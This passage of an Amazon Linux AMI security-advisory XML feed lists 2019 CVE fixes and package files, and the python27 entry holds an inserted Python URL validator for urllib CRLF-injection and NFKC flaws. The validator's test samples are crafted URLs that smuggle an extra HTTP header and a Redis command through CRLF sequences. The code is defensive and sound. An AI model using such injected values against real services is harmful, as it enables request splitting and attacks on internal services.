version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gd-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pdo-dblib-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-debuginfo" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-debuginfo-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-enchant" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-enchant-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-pgsql" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-pgsql-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-mysqlnd" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-mysqlnd-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-snmp" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-snmp-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-fpm" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-fpm-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-bcmath" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-bcmath-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-gmp" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-gmp-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-recode" version="7.3.5" release="1.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/php73-recode-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.5" release="1.15.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php73-imap-7.3.5-1.15.amzn1.x86_64.rpm</filename></package><package name="php73-imap" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-imap-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-process" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-process-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-json" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-json-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-dba" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dba-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-mysqlnd" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mysqlnd-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-enchant" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-enchant-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-odbc" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-odbc-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-xmlrpc" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xmlrpc-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-fpm" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-fpm-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-pdo" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-gd" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gd-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-pspell" version="7.3.5" release="1.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-pspell-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-cli" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-cli-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-bcmath" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-bcmath-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-embedded" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-embedded-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-pgsql" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pgsql-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-debuginfo" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-debuginfo-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-dbg" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-dbg-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-devel" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-devel-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-snmp" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-snmp-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-xml" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-xml-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-recode" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-recode-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-gmp" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-gmp-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-intl" version="7.3.5" release="1.15.amzn1" epoch="0" 
arch="i686"><filename>Packages/php73-intl-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-soap" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-soap-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-pdo-dblib" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-pdo-dblib-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-ldap" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-ldap-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-tidy" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-tidy-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-mbstring" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-mbstring-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-opcache" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-opcache-7.3.5-1.15.amzn1.i686.rpm</filename></package><package name="php73-common" version="7.3.5" release="1.15.amzn1" epoch="0" arch="i686"><filename>Packages/php73-common-7.3.5-1.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1230</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1230: medium priority package update for python27</title><issued date="2019-06-25 21:32:00" /><updated date="2019-06-28 21:17:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-9947:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the path component of a URL that lacks a ? character) followed by an HTTP header or a Redis command. This is similar to the CVE-2019-9740 query string issue.
1695572:
CVE-2019-9947 python: improper neutralization of CRLF sequences in urllib module
CVE-2019-9740:
An issue was discovered in urllib2 in Python 2.x through 2.7.16 and urllib in Python 3.x through 3.7.3. CRLF injection is possible if the attacker controls a url parameter, as demonstrated by the first argument to urllib.request.urlopen with \r\n (specifically in the query string after a ? character) followed by an HTTP header or a Redis command.
1688169:
CVE-2019-9740 python: improper neutralization of CRLF sequences in urllib module
CVE-2019-9636:
Python 2.7.x through 2.7.16 and 3.x through 3.7.2 is affected by: Improper Handling of Unicode Encoding (with an incorrect netloc) during NFKC normalization. The impact is: Information disclosure (credentials, cookies, etc. that are cached against a given hostname). The components are: urllib.parse.urlsplit, urllib.parse.urlparse. The attack vector is: A specially crafted URL could be incorrectly parsed to locate cookies or authentication data and send that information to a different host than when parsed correctly.
1688543:
CVE-2019-9636 python: Information Disclosure due to urlsplit improper NFKC normalization
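The three CVEs above describe two distinct URL-handling defects. The following Python block is an added example written for this page, not code from the advisory, from CPython or from the affected packages: it re-implements the two validations the fixed releases perform (rejection of ASCII control characters in the request target, and the NFKC check on the authority component) as a stand-alone pre-flight filter, and runs it over constructed sample URLs. The hostnames, the injected header and the Redis command in the samples are made up for illustration. The same control-character check covers the urllib3 (ALAS-2019-1236) and golang net/http (ALAS-2019-1238) entries later on this page, which fix the same class of request splitting.

```python
import re
import unicodedata

# Added example, not from the advisory or from CPython: a stand-alone
# re-implementation of the two URL checks that the fixed Python releases
# perform, for validating attacker-influenced URLs before they reach
# urllib on a host whose interpreter is still unpatched.

# CVE-2019-9740 / CVE-2019-9947: the fixed http.client refuses a request
# target containing an ASCII control character (0x00-0x20 or 0x7f). Without
# that check, a "\r\n" in the path or query ends the request line and the
# remainder is sent as an extra header or, to a non-HTTP listener such as
# Redis, as a separate command. The raw string is inspected on purpose:
# newer urlsplit() implementations strip CR, LF and TAB before parsing,
# which would hide the injection from a check done after parsing.
_CONTROL_CHARS = re.compile(r"[\x00-\x20\x7f]")


def has_control_chars(url):
    """True if the raw URL contains a character that permits request splitting."""
    return _CONTROL_CHARS.search(url) is not None


def _netloc_of(url):
    """Authority component of url, extracted without urllib.parse (patched
    releases raise inside urlsplit on the unsafe case, which this code wants
    to detect itself)."""
    scheme_end = url.find("://")
    if scheme_end == -1:
        return ""
    rest = url[scheme_end + 3:]
    cut = [p for p in (rest.find(d) for d in "/?#") if p != -1]
    return rest[:min(cut + [len(rest)])]


def netloc_unsafe_under_nfkc(url):
    """CVE-2019-9636: True if NFKC normalisation of the authority component
    introduces one of / ? # @ :, i.e. the host that urlsplit reports differs
    from the host that IDNA (which applies NFKC) would connect to, so cached
    cookies or credentials for one host could be sent to another."""
    netloc = _netloc_of(url)
    if not netloc or netloc.isascii():
        return False
    stripped = netloc
    for delim in "@:#?":          # delimiters already present are legitimate
        stripped = stripped.replace(delim, "")
    normalised = unicodedata.normalize("NFKC", stripped)
    if normalised == stripped:
        return False
    return any(delim in normalised for delim in "/?#@:")


def validate_url(url):
    """Return url unchanged, or raise ValueError if an unpatched urllib would mishandle it."""
    if has_control_chars(url):
        raise ValueError("control character in URL (CVE-2019-9740 / CVE-2019-9947)")
    if netloc_unsafe_under_nfkc(url):
        raise ValueError("authority changes under NFKC normalisation (CVE-2019-9636)")
    return url


# Constructed sample inputs (hostnames, header and Redis command are made up);
# the value is whether the URL should be accepted.
SAMPLES = {
    "http://api.example.test/v1/items?q=ok": True,
    "http://api.example.test/v1/items\r\nX-Injected: 1\r\n": False,   # CRLF in path
    "http://api.example.test/v1?q=1\r\nSET k v\r\n": False,            # CRLF in query
    "http://\u2100example.test/": False,        # U+2100 normalises to "a/c"
    "http://\uff03example.test/": False,        # U+FF03 normalises to "#"
    "http://api.example.test/%0d%0a": True,    # stays percent-encoded on the wire
}


def check_samples():
    """Run validate_url over SAMPLES; returns {url: accepted} for comparison with the expectations."""
    results = {}
    for url in SAMPLES:
        try:
            validate_url(url)
            results[url] = True
        except ValueError:
            results[url] = False
    return results


if __name__ == "__main__":
    for url, accepted in check_samples().items():
        status = "accepted" if accepted else "rejected"
        print(status, repr(url), "(expected)" if accepted == SAMPLES[url] else "(UNEXPECTED)")
```

Two design points: the control-character check runs on the raw string rather than on the output of urlsplit, because newer CPython releases remove tab, CR and LF inside urlsplit before parsing, so a check done afterwards would miss the injection; and a percent-encoded %0d%0a is accepted because urllib never decodes it before writing the request to the socket, so it cannot split the request.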
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9636" title="" id="CVE-2019-9636" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9740" title="" id="CVE-2019-9740" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-9947" title="" id="CVE-2019-9947" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-test" version="2.7.16" release="1.127.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.16-1.127.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.127.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.16-1.127.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.127.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.16-1.127.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.127.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.16-1.127.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.127.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.16-1.127.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.16" release="1.127.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.16-1.127.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.16" release="1.127.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.16-1.127.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.16" release="1.127.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.16-1.127.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.16" release="1.127.amzn1" epoch="0" 
arch="i686"><filename>Packages/python27-debuginfo-2.7.16-1.127.amzn1.i686.rpm</filename></package><package name="python27-tools" version="2.7.16" release="1.127.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.16-1.127.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.16" release="1.127.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.16-1.127.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.16" release="1.127.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.16-1.127.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1232</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1232: important priority package update for kernel</title><issued date="2019-07-17 23:18:00" /><updated date="2022-09-15 03:57:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-3900:
An infinite loop issue was found in the vhost_net kernel module while handling incoming packets in handle_rx(). The infinite loop could occur if one end sends packets faster than the other end can process them. A guest user, maybe a remote one, could use this flaw to stall the vhost_net kernel thread, resulting in a DoS scenario.
CVE-2019-13272:
A flaw was found in the way PTRACE_TRACEME functionality was handled in the Linux kernel. The kernel's implementation of ptrace can inadvertently grant elevated permissions to an attacker who can then abuse the relationship between the tracer and the process being traced. This flaw could allow a local, unprivileged user to increase their privileges on the system or cause a denial of service.
CVE-2019-11599:
A flaw was found in the Linux kernel where the coredump implementation does not use locking or other mechanisms to prevent vma layout or vma flags changes while it runs. This allows local users to obtain sensitive information, cause a denial of service (DoS), or possibly have unspecified other impact by triggering a race condition with mmget_not_zero or get_task_mm calls.
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-11599" title="" id="CVE-2019-11599" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-13272" title="" id="CVE-2019-13272" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-3900" title="" id="CVE-2019-3900" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-headers" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel-devel" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.133" release="88.105.amzn1" 
epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo-common-x86_64" version="4.14.133" release="88.105.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-4.14.133-88.105.amzn1.x86_64.rpm</filename></package><package name="perf" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/perf-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="perf-debuginfo" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-4.14.133-88.105.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" 
version="4.14.133" release="88.105.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-4.14.133-88.105.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1233</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1233: low priority package update for curl</title><issued date="2019-07-17 23:19:00" /><updated date="2019-07-25 18:33:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-5436:
A heap buffer overflow in the TFTP receiving code allows for DoS or arbitrary code execution in libcurl versions 7.19.4 through 7.64.1.
1710620:
CVE-2019-5436 curl: TFTP receive heap buffer overflow in tftp_receive_packet() function
CVE-2019-5435:
An integer overflow in curl&#039;s URL API results in a buffer overflow in libcurl 7.62.0 to and including 7.64.1.
1710609:
CVE-2019-5435 curl: Integer overflows in curl_url_set() function
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5435" title="" id="CVE-2019-5435" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-5436" title="" id="CVE-2019-5436" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="libcurl" version="7.61.1" release="11.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.61.1-11.91.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="11.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.61.1-11.91.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="11.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.61.1-11.91.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.61.1" release="11.91.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.61.1-11.91.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.61.1" release="11.91.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.61.1-11.91.amzn1.i686.rpm</filename></package><package name="curl" version="7.61.1" release="11.91.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.61.1-11.91.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.61.1" release="11.91.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.61.1-11.91.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.61.1" release="11.91.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.61.1-11.91.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1234</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1234: important priority package update for tomcat8</title><issued date="2019-07-17 
23:21:00" /><updated date="2019-07-25 18:35:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-0221:
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.
1713275:
CVE-2019-0221 tomcat: XSS in SSI printenv
CVE-2019-0199:
The HTTP/2 implementation in Apache Tomcat 9.0.0.M1 to 9.0.14 and 8.5.0 to 8.5.37 accepted streams with excessive numbers of SETTINGS frames and also permitted clients to keep streams open without reading/writing request/response data. By keeping streams open for requests that utilised the Servlet API&#039;s blocking I/O, clients were able to cause server-side threads to block eventually leading to thread exhaustion and a DoS.
1693325:
CVE-2019-0199 tomcat: Apache Tomcat HTTP/2 DoS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0199" title="" id="CVE-2019-0199" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0221" title="" id="CVE-2019-0221" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat8-servlet-3.1-api" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-servlet-3.1-api-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-lib" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-lib-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-jsp-2.3-api" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-jsp-2.3-api-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-docs-webapp" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-docs-webapp-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-el-3.0-api" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-el-3.0-api-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-javadoc" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-javadoc-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-admin-webapps" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-admin-webapps-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package name="tomcat8-webapps" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-webapps-8.5.42-1.80.amzn1.noarch.rpm</filename></package><package 
name="tomcat8-log4j" version="8.5.42" release="1.80.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat8-log4j-8.5.42-1.80.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1235</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1235: low priority package update for tomcat7</title><issued date="2019-07-17 23:23:00" /><updated date="2019-07-25 18:35:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-0221:
The SSI printenv command in Apache Tomcat 9.0.0.M1 to 9.0.0.17, 8.5.0 to 8.5.39 and 7.0.0 to 7.0.93 echoes user provided data without escaping and is, therefore, vulnerable to XSS. SSI is disabled by default. The printenv command is intended for debugging and is unlikely to be present in a production website.
1713275:
CVE-2019-0221 tomcat: XSS in SSI printenv
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-0221" title="" id="CVE-2019-0221" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="tomcat7-admin-webapps" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-admin-webapps-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-jsp-2.2-api" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-jsp-2.2-api-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-docs-webapp" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-docs-webapp-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-javadoc" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-javadoc-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-el-2.2-api" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-el-2.2-api-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-log4j" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-log4j-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-servlet-3.0-api" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-servlet-3.0-api-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-lib" version="7.0.94" release="1.35.amzn1" epoch="0" arch="noarch"><filename>Packages/tomcat7-lib-7.0.94-1.35.amzn1.noarch.rpm</filename></package><package name="tomcat7-webapps" version="7.0.94" release="1.35.amzn1" epoch="0" 
arch="noarch"><filename>Packages/tomcat7-webapps-7.0.94-1.35.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2019-1236</id><title>Amazon Linux AMI 2014.03 - ALAS-2019-1236: medium priority package update for python-urllib3</title><issued date="2019-07-17 23:24:00" /><updated date="2019-07-25 18:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2019-11236:
In the urllib3 library through 1.24.1 for Python, CRLF injection is possible if the attacker controls the request parameter.
1700824:
CVE-2019-11236 python-urllib3: CRLF injection due to not encoding the '\r\n' sequence, leading to possible attacks on internal services.
